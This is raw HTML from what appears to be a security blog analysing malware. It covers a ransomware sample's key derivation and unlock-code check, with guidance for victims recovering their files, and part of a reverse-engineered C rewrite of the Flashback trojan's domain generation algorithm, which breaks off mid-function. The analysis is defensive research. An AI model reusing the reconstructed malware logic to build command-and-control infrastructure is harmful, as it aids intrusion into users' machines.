<span class="Apple-style-span" style="border-collapse: collapse; color: #7a482f; font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span></span><br />
<span class="Apple-style-span" style="border-collapse: collapse; color: #7a482f; font-size: 11px;"><span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="border-collapse: separate;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#define ROTATE_LEFT(a,n)( (a<<n) | (a >> (<span class="Apple-style-span" style="color: #2832cf;">8-n</span></span></span></span></span><span class="Apple-style-span" style="border-collapse: collapse; color: #7a482f; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) )</span></span></span><br />
<span class="Apple-style-span" style="border-collapse: collapse; color: #7a482f; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span></span><span class="Apple-style-span" style="border-collapse: collapse; color: #bf2e9d; font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="color: #7a482f;"> </span></span></span></span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Courier New', Courier, monospace;"> </span><br />
<span class="Apple-style-span" style="border-collapse: collapse; color: #bf2e9d; font-family: Menlo; font-size: 11px;"><span style="color: black;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span></span></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="border-collapse: collapse;"> </span>A = Filename[</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">];</span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span></span><span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> for</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">(i = </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">; i < </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">; i++)</span></span></span><br />
<span class="Apple-style-span" style="font-family: Menlo; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> {</span><br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">GeneratedKey[i] = StaticKey[i] ^ A;</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> A = </span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">ROTATE_LEFT(A, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span></span></div>
<br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Finally I noticed that the malware doesn't encrypt the entire file, but it skips the first </span><span class="Apple-style-span" style="color: #274e13;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">0x47</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> bytes. I believe that this is done because the first bytes of a file usually contain a header (depending on the type of the file), and these headers may contain predictable data that may allow </span><a href="http://en.wikipedia.org/wiki/Known-plaintext_attack"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">known plaintext attacks</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">We have gone through the encryption: they key is generated starting from a static seed, and then TEA is used, so if you have been infected you can generate your decryption keys and get your files back.</span></div>
</div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">You can use the python script from F-Secure, which performs the decryption automatically. However, users should note that they should NOT rename the encrypted files: the encryption key is generated combining the static key with the first character of the filename, so changing the filename of an encrypted file may cause incorrect decryption.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Alternatively, the malware prompts the user for a code that if inserted will cause the malware to decrypt all encrypted files and then remove itself. The code will be sent of course only after a user sends money to the malware author.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht31FNlQZhyRKYGuBH4bko7nB4o2QUxEIBB3ZMJ1cbI8Bvwg9-uEVT-5upH9BWFyPh4zVb9fuTLsi6bn5h_Cy_I2EGj1MqgqqiqD1YUOWwKTnc7OdC3NHit2O1-HoCpdFMh-yto_Z6gcw/s1600/shot3.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht31FNlQZhyRKYGuBH4bko7nB4o2QUxEIBB3ZMJ1cbI8Bvwg9-uEVT-5upH9BWFyPh4zVb9fuTLsi6bn5h_Cy_I2EGj1MqgqqiqD1YUOWwKTnc7OdC3NHit2O1-HoCpdFMh-yto_Z6gcw/s1600/shot3.bmp" /></a></div>
<br />
<br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Can't we just get this code? Does it really work? I tried forcing the tool to accept any code (I cracked it, if you want to put it that way), and the malware did decrypt the files and remove itself. So having the code may solve the problem immediately.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Unfortunately, the code is checked pretty heavily: the string you insert is hashed five times with MD5 (the hash is performed through Windows Crypto APIs) , and then checked with a hash that is hardcoded in the configuration; something like this:</span><br />
<br />
<br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> if</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> MD5( MD5( MD5(MD5(MD5(Code))))) == </span></span><span class="Apple-style-span" style="color: blue;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">900140074FA550671FB6916CFF4D21CC</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 13.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">then</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> DecryptAndRemove()</span></span></div>
</div>
</div>
<div>
<span class="Apple-style-span" style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><br /></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, unless you have the time and patience to crack this MD5 hashes chain, you are better off calculating your own keys and decrypting the files yourself.</span></div>
<div>
<br /></div>giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-44098269671234261032012-04-12T12:56:00.000-07:002012-05-06T02:39:25.551-07:00Flashback Trojan: domain generator algorithm demystified<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">We already heard a lot about Flashback, a trojan targeting users of Apple's Mac OS X that has currently infected more than 600,000 machines around the world, taking advantage of a java vulnerability </span><span style="color: #484848;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> (</span><a href="http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">CVE-2012-0507</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">).</span></span><br />
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span style="color: #38761d;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">
</span></span><br />
<span style="color: #484848; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Kaspersky has conducted a good analysis: </span></span></span></span><br />
<span style="color: #484848; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: black;"></span></span></span></span><span class="Apple-style-span" style="color: #484848;"><a href="https://www.securelist.com/en/blog/208193441/Flashfake_Mac_OS_X_botnet_confirmed"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">https://www.securelist.com/en/blog/208193441/Flashfake_Mac_OS_X_botnet_confirmed</span></span></a></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Information from a user perspective has already been published: you can find removal scripts, patches, detection routines, and so on, easily all over the net. However the most interesting data about this malware, from a security standpoint, is its spreading functionality.</span></span></div>
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<div style="font-family: Helvetica; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">I recently got a sample of this malware, and analyzed a bit of code. It was easy to determine the domain generator algorithm as I noticed the piece of code that set up the url:</span></span></div>
<div style="font-family: Helvetica; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<span style="color: #38761d;"> </span>
</div>
<span style="color: #38761d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> <span class="Apple-style-span" style="color: black;">mov edi, [ebp+StrParam1]</span></span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov [esp+<span class="Apple-style-span" style="color: blue;">10</span>h], eax ; </span><span class="Apple-style-span" style="color: #bf2e9d; font-family: 'Courier New', Courier, monospace;">string</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> param2 </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov dword ptr [esp+<span class="Apple-style-span" style="color: blue;">8</span>], offset aSS ; </span><span class="Apple-style-span" style="color: #bf2e9d; font-family: 'Courier New', Courier, monospace;">char</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> format </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov dword ptr [esp+<span class="Apple-style-span" style="color: blue;">4</span>], 200h ; size_t</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov [esp+<span class="Apple-style-span" style="color: blue;">0C</span>h], edi ; </span><span class="Apple-style-span" style="color: #bf2e9d; font-family: 'Courier New', Courier, monospace;">string </span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">param1</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov [esp], ebx ; dest</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call snprintf</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> aSS db '%s%s',<span class="Apple-style-span" style="color: blue;">0</span></span><br />
<span style="color: #38761d; font-family: Helvetica; font-size: 12px;"> </span><br />
<div style="font-family: Helvetica; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The domain generator algorithm is immediately before this part.</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">I studied it for a while and rewrote it in C language:</span></span><br />
<br />
<span style="color: #783f04;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> #include</span></span></span><span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #cc0000;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><stdio.h></span></span></span><span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><br />
<span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #783f04;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#include</span></span></span><span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #cc0000;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><stdlib.h></span></span></span><br />
<span class="Apple-style-span" style="color: #cc0000;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #783f04;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#include</span></span></span><span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #cc0000;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><string.h></span></span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span style="color: #783f04;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="color: #cc0000;"> </span>#include</span></span></span><span class="Apple-style-span" style="font-family: Helvetica;"><span style="color: #38761d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-family: Helvetica;"><span style="color: #cc0000;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"><time.h></span></span></span></span></div>
</div>
<span class="Apple-style-span" style="font-family: Helvetica;"></span><br />
<span class="Apple-style-span" style="font-family: Helvetica;"><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></div>
</div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: #bf2e9d;"><span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">void</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">GenDomain(</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">void</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> {</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">struct</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">tm *ptm;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> time_t rawtime;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
</div>
<div style="color: #484848; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">unsigned</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day, month, year;</span></span></div>
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">unsigned</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">day1, day2, day3, month1, year1, year2, year3;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">unsigned</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">i, j, size;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">char</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">*domain;</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> time(&rawtime);</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> ptm = gmtime(&rawtime);</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> year = ptm->tm_year;</span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> month = ptm->tm_mon;</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day = ptm->tm_mday;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: black;"><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="color: #008326; white-space: normal;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">// compute day</span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">day1 = day ^ (day <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">);</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">if</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">((day ^ (day <<</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">16</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)) <=</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
